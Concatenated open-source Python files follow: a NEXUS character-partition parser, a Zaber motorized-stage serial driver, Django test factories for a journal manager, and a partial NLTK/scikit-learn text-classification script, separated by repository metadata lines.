lowTok = string.lower(tok)
while lowTok != ')':
if lowTok in ['notokens', 'vector']:
gm.append("Got charpartition modifier: '%s'" % tok)
gm.append("It is not implemented.")
gm.append(
"Only 'tokens' and 'standard' are implemented.")
raise P4Error(gm)
elif lowTok in ['tokens', 'standard']:
pass
else:
gm.append("Got charpartition modifier: '%s'" % tok)
gm.append("This is not understood.")
gm.append(
"(Only 'tokens' and 'standard' are implemented.)")
raise P4Error(gm)
tok = func.nexusUnquoteName(safeNextTok(flob, gm[0]))
lowTok = string.lower(tok)
else:
gm.append("Got unexpected token: '%s'" % tok)
gm.append(
"I was expecting either an '=' or something in parentheses.")
raise P4Error(gm)
tok = func.nexusUnquoteName(safeNextTok(flob, gm[0]))
lowTok = string.lower(tok)
while lowTok not in [None, ';', 'end', 'endblock']:
self.tokens.append(tok)
tok = func.nexusUnquoteName(safeNextTok(flob, gm[0]))
lowTok = string.lower(tok)
# print "_readCharPartitionDefinition: tokens %s" % self.tokens
# Divide into CharPartitionSubset instances
i = 0
while i < len(self.tokens):
aSubset = CharPartitionSubset()
aSubset.name = self.tokens[i]
if not func.nexusCheckName(aSubset.name):
gm.append("CharPartition '%s' definition:" % self.name)
gm.append("Bad subset name (%s, I think)" % aSubset.name)
raise P4Error(gm)
aSubset.lowName = string.lower(aSubset.name)
i += 1
if i >= len(self.tokens):
gm.append("CharPartition '%s' definition:" % self.name)
gm.append(
"Subset name (%s) should be followed by a colon" % aSubset.name)
raise P4Error(gm)
if self.tokens[i] != ':':
gm.append("CharPartition '%s' definition:" % self.name)
gm.append(
"Subset name (%s) should be followed by a colon" % aSubset.name)
raise P4Error(gm)
i += 1
if i >= len(self.tokens):
gm.append("CharPartition '%s' definition:" % self.name)
gm.append(
"Subset name (%s) and colon should be followed" % aSubset.name)
gm.append(
"by a subset definition (charSet or charSet definition)")
raise P4Error(gm)
while i < len(self.tokens) and self.tokens[i] != ',':
aSubset.tokens.append(self.tokens[i])
i += 1
i += 1
self.subsets.append(aSubset)
# do a once-over sanity check,
# check for duplicated names
# and convert integer strings to ints
existingPartNames = []
for aSubset in self.subsets:
# print "Checking charPartitionPart '%s'" % aSubset.name
# print " existingPartNames '%s'" % existingPartNames
if aSubset.lowName in existingPartNames:
gm.append("CharPartition '%s' definition:" % self.name)
gm.append("Duplicated subset name (%s, I think)" %
aSubset.name)
raise P4Error(gm)
existingPartNames.append(aSubset.lowName)
for i in range(len(aSubset.tokens)):
tok = aSubset.tokens[i]
lowTok = string.lower(tok)
# print "considering '%s', ord(lowTok[0])=%i" % (lowTok,
# ord(lowTok[0]))
# Does not pick up '.'!!!!
if lowTok in ['.', 'all', '-', '\\', 'remainder']:
pass
elif lowTok in self.nexusSets.charSetLowNames:
pass
elif lowTok in self.nexusSets.predefinedCharSetLowNames:
pass
else:
# print " lowTok=%s, ord(lowTok[0])=%s, ord('.')=%s" % (
# lowTok, ord(lowTok[0]), ord('.'))
try:
intTok = int(tok)
aSubset.tokens[i] = intTok
except ValueError:
gm.append("CharPartition '%s' definition:" % self.name)
gm.append("Can't understand '%s' in subset '%s' definition" %
(tok, aSubset.name))
gm.append(
"(If you are using read('whatever'), and there are backslashes,")
gm.append(
"are you using raw strings, ie read(r'whatever')?)")
raise P4Error(gm)
def setSubsetMasks(self):
"""Make charParititionSubset.mask's appropriate to the Alignment.
This is called by theAlignment.setCharPartition().
"""
gm = ['CharPartition.setSubsetMasks()']
assert self.nexusSets.aligNChar
# Make a list of triplets representing eg 23-87\3
# first item = 23, second item = 87, third = 3
# Not all will exist for each part of the char definition.
for aSubset in self.subsets:
i = 0
aSubset.triplets = []
while i < len(aSubset.tokens):
tok = aSubset.tokens[i]
if type(tok) == type('string'):
lowTok = string.lower(tok)
else:
lowTok = None
# print "Doing triplets: looking at tok '%s'" % tok
if lowTok and lowTok in self.nexusSets.charSetLowNames or \
lowTok in self.nexusSets.predefinedCharSetLowNames:
aTriplet = [lowTok, None, None]
aSubset.triplets.append(aTriplet)
i += 1
if i < len(aSubset.tokens):
if aSubset.tokens[i] == '-':
gm.append(
"CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append(
"An existing char set may not be followed by a '-'")
raise P4Error(gm)
if aSubset.tokens[i] == '\\':
gm.append(
"CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append(
"An existing char set may not be followed by a '\\'")
raise P4Error(gm)
elif lowTok in ['all', 'remainder']:
aTriplet = [lowTok, None, None]
aSubset.triplets.append(aTriplet)
i += 1
if lowTok == 'remainder' and i < len(aSubset.tokens):
gm.append("CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append(
"Char set 'remainder' must be the last one in the charPartition definition")
raise P4Error(gm)
if i < len(aSubset.tokens):
if aSubset.tokens[i] == '-':
gm.append(
"CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append(
"Char set '%s' may not be followed by a '-'" % lowTok)
raise P4Error(gm)
if aSubset.tokens[i] == '\\':
gm.append(
"CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append(
"Char set '%s' may not be followed by a '\\'" % lowTok)
raise P4Error(gm)
elif tok == '-':
gm.append("CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append("Out of place '-'")
raise P4Error(gm)
elif tok == '\\':
gm.append("CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append("Out of place '\\'")
raise P4Error(gm)
elif tok == '.':
aTriplet = [tok, None, None]
aSubset.triplets.append(aTriplet)
i += 1
if i < len(aSubset.tokens):
if aSubset.tokens[i] == '-':
gm.append(
"CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append(
"Char set '.' may not be followed by a '-'")
raise P4Error(gm)
if aSubset.tokens[i] == '\\':
gm.append(
"CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append(
"Char set '.' may not be followed by a '\\'")
raise P4Error(gm)
elif type(tok) == type(1):
aTriplet = [tok, None, None]
i = i + 1
if i < len(aSubset.tokens):
if aSubset.tokens[i] == '-':
i = i + 1
if i < len(aSubset.tokens):
if aSubset.tokens[i] == '.':
aTriplet[1] = aSubset.tokens[i]
elif type(aSubset.tokens[i]) == type(1):
if aSubset.tokens[i] > aTriplet[0]:
aTriplet[1] = aSubset.tokens[i]
else:
gm.append(
"CharPartition '%s' definition" % self.name)
gm.append(
"Subset '%s' definition" % aSubset.name)
gm.append(
"Second number of a character range must be bigger than")
gm.append("the first.")
raise P4Error(gm)
else:
gm.append(
"CharPartition '%s' definition" % self.name)
gm.append(
"Subset '%s' definition" % aSubset.name)
gm.append(
"Second item of a character range must be either a")
gm.append(
"number or a '.'. I got '%s'" % aSubset.tokens[i])
raise P4Error(gm)
i = i + 1
if i < len(aSubset.tokens):
if aSubset.tokens[i] == '\\':
i = i + 1
if i < len(aSubset.tokens):
if type(aSubset.tokens[i]) == type(1):
aTriplet[2] = aSubset.tokens[i]
else:
gm.append(
"CharPartition '%s' definition" % self.name)
gm.append(
"Subset '%s' definition" % aSubset.name)
gm.append(
"Step value of a range must be a number")
gm.append(
"(Got '%s')" % aSubset.tokens[i])
raise P4Error(gm)
i = i + 1
aSubset.triplets.append(aTriplet)
else:
gm.append("CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append("token '%s' is not understood." % tok)
raise P4Error(gm)
if 0:
print gm[0]
print "Got aSubset (%s) triplets %s" % (aSubset.name, aSubset.triplets)
# sys.exit()
aSubset.mask = array.array('c', self.nexusSets.aligNChar * '0')
for aTriplet in aSubset.triplets:
# print "setSubsetMasks() Looking at triplet '%s'" % aTriplet
first = aTriplet[0]
second = aTriplet[1]
third = aTriplet[2]
lowFirst = None
lowSecond = None
if type(first) == type('str'):
lowFirst = string.lower(first)
if type(second) == type('str'):
lowSecond = string.lower(second)
if first and not second: # its a single
# print "Got single: %s" % first
if lowFirst == 'all':
for i in range(self.nexusSets.aligNChar):
aSubset.mask[i] = '1'
elif lowFirst in self.nexusSets.predefinedCharSetLowNames:
theCS = None
if lowFirst == 'constant':
theCS = self.nexusSets.constant
elif lowFirst == 'gapped':
theCS = self.nexusSets.gapped
assert theCS
assert theCS.mask
for j in range(self.nexusSets.aligNChar):
if theCS.mask[j] == '1':
aSubset.mask[j] = '1'
elif lowFirst in self.nexusSets.charSetLowNames:
theCS = None
for cs in self.nexusSets.charSets:
if lowFirst == cs.lowName:
theCS = cs
break
assert theCS
assert theCS.mask
for j in range(self.nexusSets.aligNChar):
if theCS.mask[j] == '1':
aSubset.mask[j] = '1'
# Its legit to use this as a single char.
elif first == '.':
aSubset.mask[-1] = '1'
elif type(first) == type(1):
if first > 0 and first <= self.nexusSets.aligNChar:
aSubset.mask[first - 1] = '1'
else:
gm.append(
"CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append(
"Charset definition element '%s' is out of range" % first)
gm.append("(aligNChar = %i)" %
self.nexusSets.aligNChar)
raise P4Error(gm)
elif lowFirst == 'remainder':
# print "Got first == remainder"
for i in range(self.nexusSets.aligNChar):
aSubset.mask[i] = '1'
# print "Got new aSubset.mask = %s" % aSubset.mask
for ss in self.subsets[:-1]:
if ss.mask:
# print "Previous mask: %s" % ss.mask
for j in range(self.nexusSets.aligNChar):
if ss.mask[j] == '1':
aSubset.mask[j] = '0'
else:
gm.append(
"CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" %
aSubset.name)
gm.append(
"When implementing 'remainder' charset")
gm.append(
"Found that subset '%s' had no mask" % ss)
raise P4Error(gm)
else:
gm.append("CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append(
"Charset definition element '%s' is not understood" % first)
raise P4Error(gm)
elif first and second: # its a range
try:
start = int(first)
except ValueError:
gm.append("CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append(
"Can't parse definition element '%s'" % first)
raise P4Error(gm)
if second == '.':
fin = len(aSubset.mask)
else:
try:
fin = int(second)
except ValueError:
gm.append(
"CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append(
"Can't parse definition element '%s'" % second)
raise P4Error(gm)
if third:
try:
bystep = int(third)
except ValueError:
gm.append(
"CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append(
"Can't parse definition element '%s'" % third)
for spot in range(start - 1, fin, bystep):
aSubset.mask[spot] = '1'
else:
for spot in range(start - 1, fin):
aSubset.mask[spot] = '1'
aSubset.mask = aSubset.mask.tostring()
# print "Got char subset '%s' mask '%s'" % (aSubset.name,
# aSubset.mask)
if aSubset.mask.count('1') == 0:
gm.append(
"The mask for charPartitionSubset '%s' is empty." % aSubset.name)
raise P4Error(gm)
def checkForOverlaps(self):
gm = ['CharParitition.checkForOverlaps()']
unspanned = 0
for i in range(self.nexusSets.aligNChar):
sum = 0
for aSubset in self.subsets:
if aSubset.mask[i] == '1':
sum += 1
if sum > 1:
gm.append("Char partition '%s'" % self.name)
gm.append(
"The problem is that there are overlapping subsets in this")
gm.append(
"charpartition. The same position is in more than one subset.")
gm.append(
"Zero-based position %i, one-based position %i." % (i, i + 1))
raise P4Error(gm)
if sum < 1:
unspanned = 1
if unspanned:
gm.append("Char partition '%s'" % self.name)
gm.append("You should be aware that this partition does not span")
gm.append("the entire sequence. Hopefully that is intentional.")
def dump(self):
print " CharPartition: name: %s" % func.nexusFixNameIfQuotesAreNeeded(self.name)
# string.join(self.tokens)
print " tokens: %s" % self.tokens
# for t in self.tokens:
# print " %s" % t
print " number of subsets: %s" % len(self.subsets)
for aSubset in self.subsets:
aSubset.dump()
def writeNexusToOpenFile(self, flob):
flob.write(' charPartition %s = ' % self.name)
# print " [ %s subsets ] " % len(self.subsets)
for aSubset in self.subsets[:-1]:
aSubset.writeNexusToOpenFile(flob)
flob.write(', ')
self.subsets[-1].writeNexusToOpenFile(flob)
flob.write(';\n')
def mask(self):
if not self.nexusSets.aligNChar:
self.nexusSets.aligNChar = self.theNexusSets.aligNChar
self.setSubsetMasks()
import array
m = array.array('c', self.nexusSets.aligNChar * '0')
for i in range(self.nexusSets.aligNChar):
for aSubset in self.subsets:
if aSubset.mask[i] == '1':
m[i] = '1'
return m.tostring()
| gpl-2.0 | 7,514,382,857,311,807,000 | 41.579559 | 123 | 0.453856 | false |
AndrewGYork/tools | zaber.py | 1 | 8750 | import time
import serial
class Stage:
"""Zaber stage(s), attached through the (USB?) serial port."""
def __init__(
self,
port_name, # For example, 'COM3' on Windows
timeout=1,
verbose=True,
very_verbose=False):
"""port_name: which serial port the stage is connected to, e.g. 'COM3'
"""
self.verbose = verbose
self.very_verbose = very_verbose
try:
self.serial = serial.Serial(
port=port_name,
baudrate=9600,
bytesize=8,
parity='N',
stopbits=1,
timeout=timeout)
except serial.serialutil.SerialException:
print('Failed to open serial port for Zaber stage(s).')
print('Sometimes Windows is weird about this!')
print('Consider trying again.')
raise
if self.verbose: print("Renumbering stages:")
self.devices = self.renumber_all_devices()
self.pending_moves = [False for d in self.devices]
if self.verbose:
for d in self.devices:
print(' Axis:', d)
print(' Done renumbering.')
self.restore_settings()
self.default_speed = min([r['speed'] for r in self.get_target_speed()])
if verbose: print(" Default stage speed:", self.default_speed)
self.move_home()
def send(self, instruction):
"""Send an instruction to the Zaber stage.
'instruction' must be a list of 6 integers, 0-255 (no error
checking).
See: http://www.zaber.com/wiki/Manuals/Binary_Protocol_Manual
for a list of instructions.
"""
assert len(instruction) == 6
if self.very_verbose: print("Sending to stage:", instruction)
serial_cmd = bytes(instruction) # 0 <= int(i) < 256 for i in instruction
self.serial.write(serial_cmd)
return None
def receive(self, expected_command_ID=None):
"""Return 6 bytes from the serial port
There must be 6 bytes to receive (no error checking).
"""
response = self.serial.read(6)
if len(response) != 6:
raise UserWarning(
"Zaber stage failed to respond. Is the timeout too short?\n" +
"Is the stage plugged in?")
response = {'device_number': response[0],
'command_ID': response[1],
'data': four_bytes_to_uint(response[2:6])}
if expected_command_ID is not None:
assert response['command_ID'] == expected_command_ID
if self.very_verbose:
print("Response from stage:\n", response)
return response
def get_position(self, axis='all'):
if axis == 'all':
axis = 0
num_responses = len(self.devices)
else:
num_responses = 1
assert axis in range(len(self.devices) + 1)
self.send([axis, 60, 0, 0, 0, 0])
responses = []
for i in range(num_responses):
responses.append(self.receive(expected_command_ID=60))
axis_positions = {}
for r in responses:
axis_positions[r['device_number']] = r['data']
return axis_positions
def move(self, distance, movetype='absolute', response=True, axis='all'):
distance = int(distance)
if self.verbose:
print("Moving axis: ", repr(axis),
" distance ", distance, " (", movetype, ")", sep='')
if axis == 'all':
axis = 0
assert self.pending_moves == [False for d in self.devices]
else:
assert axis in [d['device_number'] for d in self.devices]
assert self.pending_moves[(axis - 1)] == False
if movetype == 'absolute':
instruction = [axis, 20]
elif movetype == 'relative':
instruction = [axis, 21]
else:
raise UserWarning("Move type must be 'relative' or 'absolute'")
# Data conversion and transfer:
instruction.extend(uint_to_four_bytes(distance))
self.send(instruction)
if axis == 0:
self.pending_moves = [True for d in self.devices]
else:
self.pending_moves[axis - 1] = True
if response:
return self.finish_moving()
return None
def finish_moving(self):
response = []
for i in range(len(self.devices)):
if self.pending_moves[i]:
response.append(self.receive())
assert response[-1]['command_ID'] in (1, 20, 21)
self.pending_moves = [False for d in self.devices]
assert self.serial.inWaiting() == 0
return response
def move_home(self, response=True):
if self.verbose: print("Moving stage(s) near home...")
self.move(100)
if self.verbose: print("Moving stage(s) home.")
assert self.pending_moves == [False for d in self.devices]
self.send([0, 1, 0, 0, 0, 0])
self.pending_moves = [True for d in self.devices]
if response:
return self.finish_moving()
return None
def restore_settings(self):
if self.verbose: print("Restoring stage(s) to default settings.")
assert self.pending_moves == [False for d in self.devices]
assert self.serial.inWaiting() == 0
self.send([0, 36, 0, 0, 0, 0]) # Restore to default settings
for d in self.devices:
self.receive(expected_command_ID=36)
self.send([0, 116, 1, 0, 0, 0]) # Disable manual move tracking
for d in self.devices:
self.receive(expected_command_ID=116)
assert self.serial.inWaiting() == 0
return None
def renumber_all_devices(self):
self.serial.flushInput()
self.serial.flushOutput()
self.send([0, 2, 0, 0, 0, 0])
# We can't predict the length of the response, since we don't
# yet know how many stages there are. Just wait a healthy amount
# of time for the answer:
time.sleep(.8) # Seems to take a little over 0.5 seconds.
bytes_waiting = self.serial.inWaiting()
assert bytes_waiting % 6 == 0 # Each stage responds with 6 bytes.
num_stages = int(bytes_waiting / 6)
stages = []
for n in range(num_stages):
r = self.receive()
assert (r['device_number'] - 1) in range(num_stages)
assert r.pop('command_ID') == 2
r['device_ID'] = r.pop('data')
assert r['device_ID'] in (# List of devices we've tested; add liberally.
20053,
)
stages.append(r)
assert self.serial.inWaiting() == 0
return stages
def set_target_speed(self, speed, response=True):
min_speed = int(self.default_speed * 0.01)
max_speed = int(2*self.default_speed)
speed = int(speed)
assert min_speed <= speed < max_speed
if self.verbose: print("Setting stage speed to", speed)
inst = [0, 42]
inst.extend(uint_to_four_bytes(speed))
self.send(inst)
if response:
reply = [self.receive(expected_command_ID=42)
for d in self.devices]
return reply
def get_target_speed(self):
inst = [0, 53, 42, 0, 0, 0]
self.send(inst)
reply = []
for d in self.devices:
reply.append(self.receive())
assert reply[-1].pop('command_ID') == 42
reply[-1]['speed'] = reply[-1].pop('data')
return reply
def close(self):
self.move_home()
self.serial.close()
def four_bytes_to_uint(x):
assert len(x) == 4
return int.from_bytes(x, byteorder='little')
def uint_to_four_bytes(x):
assert 0 <= x < 4294967296
return [x >> i & 0xff for i in (0, 8, 16, 24)]
if __name__ == '__main__':
my_stage = Stage(port_name='COM3', verbose=True, very_verbose=False)
try:
my_stage.move(0, movetype='absolute', axis='all')
for i in range(len(my_stage.devices)):
my_stage.move(70000, movetype='absolute', axis=i+1)
print("Stage postion:", my_stage.get_position())
my_stage.move(0, movetype='absolute', axis=i+1)
print("Stage postion:", my_stage.get_position())
my_stage.set_target_speed(my_stage.default_speed * 1.3)
my_stage.move(70000, movetype='absolute', axis='all')
print("Stage postion:", my_stage.get_position())
my_stage.move(0, movetype='absolute', axis='all')
print("Stage postion:", my_stage.get_position())
my_stage.set_target_speed(my_stage.default_speed)
finally:
my_stage.close()
| gpl-2.0 | 8,001,192,624,062,251,000 | 37.377193 | 84 | 0.56 | false |
jfunez/scielo-manager | scielomanager/journalmanager/tests/modelfactories.py | 1 | 7014 | # coding: utf-8
import factory
import datetime
from journalmanager import models
class ArticleFactory(factory.Factory):
FACTORY_FOR = models.Article
front = {
'default-language': 'en',
'title-group': {
'en': u'Article Title',
'pt': u'Título do Artigo',
}
}
xml_url = 'http://xml.url/'
pdf_url = 'http://pdf.url/'
images_url = 'http://img.url/'
class UserFactory(factory.Factory):
FACTORY_FOR = models.User
@classmethod
def _setup_next_sequence(cls):
try:
return cls._associated_class.objects.values_list(
'id', flat=True).order_by('-id')[0] + 1
except IndexError:
return 0
username = factory.Sequence(lambda n: "username%s" % n)
first_name = factory.Sequence(lambda n: "first_name%s" % n)
last_name = factory.Sequence(lambda n: "last_name%s" % n)
email = factory.Sequence(lambda n: "email%[email protected]" % n)
password = 'sha1$caffc$30d78063d8f2a5725f60bae2aca64e48804272c3'
is_staff = False
is_active = True
is_superuser = False
last_login = datetime.datetime(2000, 1, 1)
date_joined = datetime.datetime(1999, 1, 1)
class SubjectCategoryFactory(factory.Factory):
FACTORY_FOR = models.SubjectCategory
term = 'Acoustics'
class StudyAreaFactory(factory.Factory):
FACTORY_FOR = models.StudyArea
study_area = 'Health Sciences'
class SponsorFactory(factory.Factory):
FACTORY_FOR = models.Sponsor
name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'
address = u'Av. Professor Lineu Prestes, 338 Cidade Universitária \
Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'
email = '[email protected]'
complement = ''
class UseLicenseFactory(factory.Factory):
FACTORY_FOR = models.UseLicense
license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)
reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'
disclaimer = u'<a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/"><img alt="Licença Creative Commons" style="border-width:0" src="http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png" /></a><br />Este trabalho foi licenciado com uma Licença <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'
class CollectionFactory(factory.Factory):
FACTORY_FOR = models.Collection
url = u'http://www.scielo.br/'
name = factory.Sequence(lambda n: 'scielo%s' % n)
address_number = u'430'
country = u'Brasil'
address = u'Rua Machado Bittencourt'
email = u'[email protected]'
name_slug = factory.Sequence(lambda n: 'scl%s' % n)
class JournalFactory(factory.Factory):
FACTORY_FOR = models.Journal
ctrl_vocabulary = u'decs'
frequency = u'Q'
scielo_issn = u'print'
print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))
init_vol = u'1'
title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'
title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'
short_title = u'ABCD.(São Paulo)'
editorial_standard = u'vancouv'
secs_code = u'6633'
init_year = u'1986'
acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))
pub_level = u'CT'
init_num = u'1',
subject_descriptors = u"""
MEDICINA
CIRURGIA
GASTROENTEROLOGIA
GASTROENTEROLOGIA""".strip()
pub_status = u'current'
pub_status_reason = u'Motivo da mudança é...'
publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'
publisher_country = u'BR'
publisher_state = u'SP'
publication_city = u'São Paulo'
editor_address = u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'
editor_email = u'[email protected]'
creator = factory.SubFactory(UserFactory)
pub_status_changed_by = factory.SubFactory(UserFactory)
use_license = factory.SubFactory(UseLicenseFactory)
collection = factory.SubFactory(CollectionFactory)
class SectionFactory(factory.Factory):
FACTORY_FOR = models.Section
code = factory.Sequence(lambda n: 'BJCE%s' % n)
journal = factory.SubFactory(JournalFactory)
class LanguageFactory(factory.Factory):
FACTORY_FOR = models.Language
iso_code = 'pt'
name = 'portuguese'
class IssueTitleFactory(factory.Factory):
"""
``issue`` must be provided
"""
FACTORY_FOR = models.IssueTitle
language = factory.SubFactory(LanguageFactory)
title = u'Bla'
class IssueFactory(factory.Factory):
FACTORY_FOR = models.Issue
total_documents = 16
number = factory.Sequence(lambda n: '%s' % n)
volume = factory.Sequence(lambda n: '%s' % n)
is_trashed = False
publication_start_month = 9
publication_end_month = 11
publication_year = 2012
is_marked_up = False
suppl_text = '1'
journal = factory.SubFactory(JournalFactory)
@classmethod
def _prepare(cls, create, **kwargs):
section = SectionFactory()
issue = super(IssueFactory, cls)._prepare(create, **kwargs)
issue.section.add(section)
return issue
class UserProfileFactory(factory.Factory):
FACTORY_FOR = models.UserProfile
user = factory.SubFactory(UserFactory)
email = factory.Sequence(lambda n: 'email%[email protected]' % n)
class SectionTitleFactory(factory.Factory):
FACTORY_FOR = models.SectionTitle
title = u'Artigos Originais'
language = factory.SubFactory(LanguageFactory)
section = factory.SubFactory(SectionFactory)
class DataChangeEventFactory(factory.Factory):
FACTORY_FOR = models.DataChangeEvent
user = factory.SubFactory(UserFactory)
content_object = factory.SubFactory(JournalFactory)
collection = factory.SubFactory(CollectionFactory)
event_type = 'added'
class RegularPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.RegularPressRelease
issue = factory.SubFactory(IssueFactory)
doi = factory.Sequence(lambda n: 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class AheadPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.AheadPressRelease
journal = factory.SubFactory(JournalFactory)
doi = factory.Sequence(lambda n: 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class PressReleaseTranslationFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseTranslation
language = factory.SubFactory(LanguageFactory)
press_release = factory.SubFactory(RegularPressReleaseFactory)
title = u'Yeah, this issue is amazing!'
content = u'Want to read more about...'
class PressReleaseArticleFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseArticle
press_release = factory.SubFactory(RegularPressReleaseFactory)
article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)
| bsd-2-clause | 7,171,025,614,157,088,000 | 29.806167 | 429 | 0.680967 | false |
rbharvs/mnd-learning | supervised.py | 1 | 8636 | import sys
import parsetags
import numpy as np
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.naive_bayes import MultinomialNB
from sklearn import svm
from sklearn.decomposition import PCA as PCA
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
import nltk
from nltk.stem import LancasterStemmer
import re
def get_top_tags(segment_tags, n):
tag_freqs = {}
for tag_list in segment_tags.values():
for tag in tag_list:
if tag not in tag_freqs:
tag_freqs[tag] = 0
tag_freqs[tag] += 1
return ['NULL'] + sorted(tag_freqs.keys(), key=lambda x: tag_freqs[x])[-n:]
def get_common_words(n=100):
try:
file_content = open(sys.argv[3]).read()
common_words = nltk.word_tokenize(file_content)
except IndexError:
return None
return set(common_words[:n])
def get_named_entities():
try:
file_content = open(sys.argv[2]).read()
named_entities = nltk.word_tokenize(file_content)
except IndexError:
return None
return set(named_entities)
def filter_segments(segment_tags, ntags):
filtered_segtags = {}
for segment in segment_tags:
# np.random.shuffle(segment_tags[segment])
for tag in segment_tags[segment]:
if tag not in ntags: continue
filtered_segtags[segment] = ntags.index(tag)
if segment not in filtered_segtags:
filtered_segtags[segment] = 0
return filtered_segtags
def increase_num_segments(segment_tags, n, length=1000):
new_segment_tags = {}
segments = sorted(segment_tags.keys(), key=len)
lengths = np.array([len(seg) for seg in segments])
dist = lengths/np.sum(lengths)
random_segments = np.random.choice(segments, size=n, p=dist)
for segment in random_segments:
new_segment = segment
if len(new_segment) > length:
index = np.random.randint(0, len(new_segment)-length)
new_segment = new_segment[index:index+length]
new_segment_tags[new_segment] = segment_tags[segment]
return new_segment_tags
def named_entity_reduction(segment_tags, named_entities, common_words):
punctuation = [',', '.', "'", '?', ';', ':', '!', '(', ')', '`', '--'
'\xe2', '\x80', '\x94', '\x99']
new_segments = []
segments = list(segment_tags.keys())
for segment in segments:
new_segment = ''
tokens = nltk.word_tokenize(segment)
for token in tokens:
if token in punctuation: continue
if token.lower() in common_words: continue
if token not in named_entities: continue
new_segment += token + ' '
new_segments.append(new_segment)
new_segment_tags = {}
for i in range(len(segments)):
new_segment_tags[new_segments[i]] = segment_tags[segments[i]]
return new_segment_tags
def stemming_reduction(segment_tags):
punctuation = [',', '.', "'", '?', ';', ':', '!', '(', ')', '`', '--'
'\xe2', '\x80', '\x94', '\x99']
new_segments = []
stemmer = LancasterStemmer()
segments = list(segment_tags.keys())
for segment in segments:
new_segment = ''
segment = re.sub(r'[^\x00-\x7f]',r'', segment)
tokens = nltk.word_tokenize(segment)
for token in tokens:
if token in punctuation: continue
try:
new_segment += stemmer.stem(token)+' '
except UnicodeDecodeError:
new_segment += ''
new_segments.append(new_segment)
stemmed_segment_tags = {}
for i in range(len(segments)):
stemmed_segment_tags[new_segments[i]] = segment_tags[segments[i]]
return stemmed_segment_tags
def separate_segments(segment_tags, k):
train = {}
for segment in segment_tags.keys():
if np.random.random() < k:
train[segment] = segment_tags.pop(segment)
return train, segment_tags
def bag_of_words(segment_tags, tfidf=False):
#create matrix of word frequencies
segments = list(segment_tags.keys())
vec = CountVectorizer()
word_freqs = vec.fit_transform(segments).toarray()
if tfidf:
tfidf_transformer = TfidfTransformer()
word_freqs = tfidf_transformer.fit_transform(word_freqs)
labels = np.empty(shape=len(segments))
for i in range(len(segments)):
labels[i] = segment_tags[segments[i]]
return word_freqs, labels, segments
def entity_bow(segment_tags, named_entities, common_words):
punctuation = [',', '.', "'", '?', ';', ':', '!', '(', ')', '`', '--'
'\xe2', '\x80', '\x94', '\x99']
new_segments = []
segments = list(segment_tags.keys())
for segment in segments:
new_segment = ''
tokens = nltk.word_tokenize(segment)
for token in tokens:
if token in punctuation: continue
if token.lower() in common_words: continue
if token not in named_entities: continue
new_segment += token + ' '
new_segments.append(new_segment)
vec = CountVectorizer()
word_freqs = vec.fit_transform(new_segments).toarray()
tfidf_transformer = TfidfTransformer()
X_train_tfidf = tfidf_transformer.fit_transform(word_freqs)
print(word_freqs.shape, X_train_tfidf.shape)
labels = np.empty(shape=len(segments))
for i in range(len(segments)):
labels[i] = segment_tags[segments[i]]
return X_train_tfidf, labels, segments
def pca_plot(Xtrain, ytrain):
#binary classification case
X_reduced = Xtrain
pca = PCA(3)
X_pca = pca.fit_transform(X_reduced)
ax = plt.axes(projection='3d')
for i in range(X_pca.shape[0]):
if ytrain[i] == 1:
ax.scatter(X_pca[i, 0], X_pca[i, 2], X_pca[i, 1], 'o', color='blue')
else:
ax.scatter(X_pca[i, 0], X_pca[i, 2], X_pca[i,1], 'x', color='red')
plt.show()
def randomize_order(X, y, segments):
shuffled_segments = []
indices = np.arange(len(segments))
np.random.shuffle(indices)
X, y = X[indices], y[indices]
for i in indices:
shuffled_segments.append(segments[i])
return X, y, segments
def naive_bayes(segment_tags, k=0.5, normalize=False):
X, y, segments = randomize_order(*bag_of_words(segment_tags, tfidf=normalize))
num_examples = len(segments)
